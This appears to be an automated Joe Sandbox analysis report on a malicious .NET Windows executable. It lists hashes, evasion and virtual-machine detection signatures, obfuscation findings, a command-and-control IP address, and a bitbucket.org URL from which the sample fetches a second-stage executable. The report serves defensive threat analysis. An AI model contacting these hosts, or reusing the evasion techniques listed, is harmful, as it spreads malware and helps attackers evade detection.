Edit tour

Windows Analysis Report
ozfqy8Ms6t.exe

Overview

General Information

Sample name:	ozfqy8Ms6t.exe renamed because original name is a hash value
Original sample name:	9b5bda80417b3128dc2c378ddb0014f0afb2345ad5d33555e92e2023ef5c1515.exe
Analysis ID:	1573896
MD5:	7e230785cac6be6b780603a6c8b4ef32
SHA1:	55938fa77363817e062b11c246261d3486a0185b
SHA256:	9b5bda80417b3128dc2c378ddb0014f0afb2345ad5d33555e92e2023ef5c1515
Tags:	181-131-217-244exeuser-JAMESWT_MHT
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Yara detected Costura Assembly Loader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

ozfqy8Ms6t.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\ozfqy8Ms6t.exe" MD5: 7E230785CAC6BE6B780603A6C8B4EF32)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.4601478973.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.4602971347.00000000054B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.4600329598.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: ozfqy8Ms6t.exe PID: 7008	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.ozfqy8Ms6t.exe.4026ec0.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.ozfqy8Ms6t.exe.54b0000.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ozfqy8Ms6t.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: ozfqy8Ms6t.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: ozfqy8Ms6t.exe

Joe Sandbox ML: detected

Source: ozfqy8Ms6t.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.6:49709 version: TLS 1.2

Source: ozfqy8Ms6t.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Tsjbteflmax.pdb source: ozfqy8Ms6t.exe, 00000001.00000002.4602450523.0000000005310000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4604010643.0000000005CC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4604010643.0000000005CC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp

Source: global traffic

TCP traffic: 192.168.2.6:49707 -> 181.131.217.244:30203

Source: global traffic

HTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 181.131.217.244 181.131.217.244
Source: Joe Sandbox View	IP Address: 185.166.143.50 185.166.143.50

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: navegacionseguracol24vip.org
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com

Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000313E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bitbucket.org
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000313E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s3-w.us-east-1.amazonaws.com
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000313E000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003126000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003126000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002EA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.000000000311C000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000003118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709

Source: unknown

HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.6:49709 version: TLS 1.2

System Summary

.NET source code contains very large array initializations

Source: ozfqy8Ms6t.exe, VirtualSender.cs

Large array initialization: TransmitIntegratedSender: array initializer size 543840

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_02C37248	1_2_02C37248
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_02C37258	1_2_02C37258
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_02C3494B	1_2_02C3494B
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_02C34960	1_2_02C34960
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_02C31E5A	1_2_02C31E5A
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_02C31E68	1_2_02C31E68
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_054203C7	1_2_054203C7
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05421470	1_2_05421470
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_054206FF	1_2_054206FF
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_0543236B	1_2_0543236B
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05438EB8	1_2_05438EB8
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05438519	1_2_05438519
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05438528	1_2_05438528
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05438FC7	1_2_05438FC7
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05433236	1_2_05433236
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05438EA9	1_2_05438EA9
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_055724B8	1_2_055724B8
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_055756A0	1_2_055756A0
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_055773B0	1_2_055773B0
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_0557A251	1_2_0557A251
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05570B58	1_2_05570B58
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05576B70	1_2_05576B70
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05574A88	1_2_05574A88
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05577507	1_2_05577507
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_055724A8	1_2_055724A8
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_0557779B	1_2_0557779B
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_0557A60C	1_2_0557A60C
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_055773A1	1_2_055773A1
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05574DD0	1_2_05574DD0
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Code function: 1_2_05576B60	1_2_05576B60

Source: ozfqy8Ms6t.exe, 00000001.00000002.4599312406.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ozfqy8Ms6t.exe
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ozfqy8Ms6t.exe
Source: ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs ozfqy8Ms6t.exe
Source: ozfqy8Ms6t.exe, 00000001.00000000.2125195391.00000000009B6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEdjcao.exe" vs ozfqy8Ms6t.exe
Source: ozfqy8Ms6t.exe, 00000001.00000002.4604010643.0000000005CC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs ozfqy8Ms6t.exe
Source: ozfqy8Ms6t.exe, 00000001.00000002.4602450523.0000000005310000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTsjbteflmax.dll" vs ozfqy8Ms6t.exe
Source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs ozfqy8Ms6t.exe
Source: ozfqy8Ms6t.exe	Binary or memory string: OriginalFilenameEdjcao.exe" vs ozfqy8Ms6t.exe

Source: ozfqy8Ms6t.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: ozfqy8Ms6t.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ozfqy8Ms6t.exe, VirtualSender.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ozfqy8Ms6t.exe, TemplateConverter.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ozfqy8Ms6t.exe, TemplateConverter.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, t9S849sA4DbtdhgyMHE.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, EaTd9Fb6Mdysqov4nGh.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, zEO5VEbFZWNDes2oZSS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, YT5sTjWje3EeKLxM3V.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.ozfqy8Ms6t.exe.5310000.2.raw.unpack, YT5sTjWje3EeKLxM3V.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.ozfqy8Ms6t.exe.5cc0000.5.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal84.evad.winEXE@1/0@4/2

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Mutant created: \Sessions\1\BaseNamedObjects\mono1234

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

File created: C:\Users\user\AppData\Local\Temp\xqarc.exe

Jump to behavior

Source: ozfqy8Ms6t.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ozfqy8Ms6t.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ozfqy8Ms6t.exe

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\ozfqy8Ms6t.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ozfqy8Ms6t.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ozfqy8Ms6t.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Tsjbteflmax.pdb source: ozfqy8Ms6t.exe, 00000001.00000002.4602450523.0000000005310000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4604010643.0000000005CC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ozfqy8Ms6t.exe, 00000001.00000002.4600329598.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, ozfqy8Ms6t.exe, 00000001.00000002.4604010643.0000000005CC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: ozfqy8Ms6t.exe, 00000001.00000002.4603091938.0000000005510000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: ozfqy8Ms6t.exe, TemplateConverter.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
